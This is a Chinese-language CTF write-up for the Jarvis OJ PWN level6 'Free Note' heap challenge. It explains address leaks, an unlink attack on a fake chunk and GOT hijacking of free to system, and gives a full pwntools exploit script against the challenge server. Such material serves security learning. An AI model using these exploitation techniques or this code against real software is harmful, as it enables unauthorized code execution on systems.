Jarvis OJ PWN level6 WriteUp

終于做完了自己在pwn方向的第一道堆題,參考了writeup1writeup2懟了四天,終于理解了整道題目,本地調通了,但是題目服務器貌似有點問題,題目提供的libc偏移對不上,遠程沒有調通

整體思路

  1. 泄露出libc的基址和heap的地址
  2. 根據(jù)泄露的libc基址算出system函數(shù)的基址
  3. 偽造chunk,free掉偽造的chunk觸發(fā)unlink,使得可以任意地址寫
  4. 劫持got表中的free為system函數(shù)地址,調用刪除功能,getshell

具體分析

首先查看程序功能:

== Blue-lotus Free Note ==
1. List Note
2. New Note
3. Edit Note
4. Delete Note
5. Exit
====================
Your choice:

再拖入IDA看一下邏輯。找到可以利用的地方:

  1. 程序一開始malloc一個3096大小的堆用來管理之后創(chuàng)建的note
  2. delete功能在free之后沒有將指針置空,可以進行利用
  3. 在new note的時候,尾部沒有加上\x00,可以用來進行地址泄露
  4. 在new note的時候,有邏輯判斷讓malloc的chunk至少為136大小,屬于small chunk的范疇,可以使用unlink

地址泄露

libc地址泄露的具體原理為:

  1. 由于在寫入的時候沒有加上\x00,所以在輸出的時候可以也一直輸出到之后的\x00為止。
  2. 當chunk被free掉后fd和bk指針會的值為<main_arena+offset>,而<main_arena+offset>與libc加載地址的相對偏移是固定的。所以只需要泄露出<main_arena+offset>,再在本地調試找到算出libc和main_arena的偏移,便能知道libc的基址
  3. 最終操作為:創(chuàng)建兩個note(chunk)(防止top chunk的合并)=>free掉第一個=>再創(chuàng)建note(這時候申請的chunk的大小要與free掉的一致才能申請到原來的空間,且輸入的大小不能超過四個字節(jié),否則會覆蓋地址信息)=>list note拿到地址信息

heap地址泄露的原理為:當兩個不相鄰的chunk被free掉時,會至于bin的鏈表中,本例中會先放到unsorted bin中,這時chunk的fd和bk中存有chunk的地址信息,接下來操作同上文則可泄露heap地址。

unlink

程序在最開始的時候,申請了一個堆作為note的管理,可以看到里面存儲了note的地址,所以通過unlink偽造chunk的方式可以取得該區(qū)的控制權,從而能任意地址寫,劫持got表。需要注意的是偽造chunk的大小要地址對齊。

exp

from pwn import *

context.log_level = 'debug'
#p = process('./freenote_x86')
#libc = ELF('./libc-2.19.so')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
elf = ELF('./freenote_x86')
p = remote('pwn2.jarvisoj.com',9885)
def newNote(length, content):
    p.recvuntil('Your choice: ')
    p.sendline('2')
    p.recvuntil('Length of new note: ')
    p.sendline(str(length))
    p.recvuntil('Enter your note: ')
    p.send(content)
    sleep(0.2)

def deleteNote(number):
    p.recvuntil('Your choice: ')
    p.sendline('4')
    p.recvuntil('Note number: ')
    p.sendline(str(number))

def editNote(number, length, content):
    p.recvuntil('Your choice: ')
    p.sendline('3')
    p.recvuntil('Note number: ')
    p.sendline(str(number))
    p.recvuntil('Length of note: ')
    p.sendline(str(length))
    p.recvuntil('Enter your note: ')
    p.sendline(content)

def listNote():
    p.recvuntil('Your choice: ')
    p.sendline('1')

if __name__ == '__main__':
# ======================================== leak libc address
    offset = 0x1b27b0 # main to libc
    newNote(7,'a'*7) # 0
    sleep(0.2)
    newNote(7,'b'*7) # 1
    sleep(0.2)
    deleteNote(0)
    newNote(1,'0')
    listNote()
    sleep(0.2)
    p.recv(7)
    main_addr = u32(p.recv(4))
    libc_addr = main_addr - offset
    system_addr = libc_addr + libc.symbols['system']
    print 'leak address:%x'%main_addr
    print 'libc address:%x'%libc_addr
# ========================================= leak heap address
    newNote(7,'c'*7) # 2
    newNote(7,'d'*7) # 3

    deleteNote(0)
    deleteNote(2)
    newNote(1,'0')
    listNote()
    sleep(0.2)
    p.recv(7)
    heap_base = u32(p.recv(4))-0xd28
    print 'heap address:%x'%heap_base
    deleteNote(0)
    deleteNote(1)
    deleteNote(3)
# ========================================= unlink
    payload = p32(0)+p32(0x81)+p32(heap_base+0x18-12)+p32(heap_base+0x18-8)# fakechunk1: prev_size size fd bk fill_data 0x88
    payload = payload.ljust(0x80,'a') 
    payload += p32(0x80)+p32(0x80) # fakechunk2: prev_size size fd-data 
    payload = payload.ljust(0x80*2,'a')
    newNote(len(payload),payload)
    sleep(0.2)
    deleteNote(1)
# ========================================= hijack got
    payload2 = p32(2)+p32(1)+p32(4)+p32(elf.got['free'])+p32(1)+p32(8)+p32(heap_base+0xca8)
    payload2 = payload2.ljust(0x80*2,'\x00')
    editNote(0,len(payload2),payload2)
    editNote(0,4,p32(system_addr))
    editNote(1,8,'/bin/sh\x00')
    print 'system address:%x'%system_addr
    # gdb.attach(p)
    deleteNote(1)
    p.interactive()
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
【社區(qū)內容提示】社區(qū)部分內容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內容

友情鏈接更多精彩內容